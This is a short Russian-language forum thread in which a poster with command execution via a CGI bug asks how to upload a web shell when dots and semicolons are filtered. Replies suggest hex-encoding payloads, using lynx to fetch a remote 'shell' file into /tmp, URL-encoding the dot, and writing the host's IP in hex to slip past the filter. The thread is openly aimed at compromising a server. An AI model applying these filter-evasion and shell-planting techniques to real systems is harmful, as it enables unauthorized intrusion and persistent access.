|
/bin/bash хелп
Короче есть бага в cgi скрипте могу исполнять команды но не могу использывать .
Сначало думал что это куйн но потом понял что залить шелл просто не реально. Да ; тоже нельзя. Вопрос как залить шелл не используя точки. на серваке есть lynx из загрузчиков. варианты извменить точку в чего либо (url кодировку не предлогать) записать эхом в файл без точки в 2 или 16 коде потом утилитой перекодировать и исполнить как .sh Как реалиховать у вас есть какие то идеи? |
Если я все правильно понял (хотя не уверен), то достаточно перевести команду в hex и залить шелл, если есть права на запись.
ha.ckers.org/xss.html |
как перевести в хекс я знаю )
нужна утилита в стандартной поставке котороая могла бы текст в файле (допусти hex) преобраховать в нормальный. короче мне надо залить шелл не используя точки и точки с запятой. |
В стандартных утилитах такого, по-моему, нет. Для этого пишутся скрипты на bash или perl. Но его еще нужно туда залить.
www.computing.net/unix/wwwboard/forum/6894.html Там несколько вариантов скриптов, переводящих hex в ascii. |
cd /tmp && lynx <url>
не выход? |
cd /tmp && lynx http://ya.ru/shell
без точек... |
А cd /tmp && lynx http://ya%2Eru/shell ?
|
нет
Цитата:
url приобразовываеться. и в конечном запросе . |
Прийдется преобразовывать ип домена ya.ru в что-то вроде 0x34a2462d.
Хз, других идей у меня нет... |
2Deem3n®
так скачаеться???? |
| Время: 17:49 |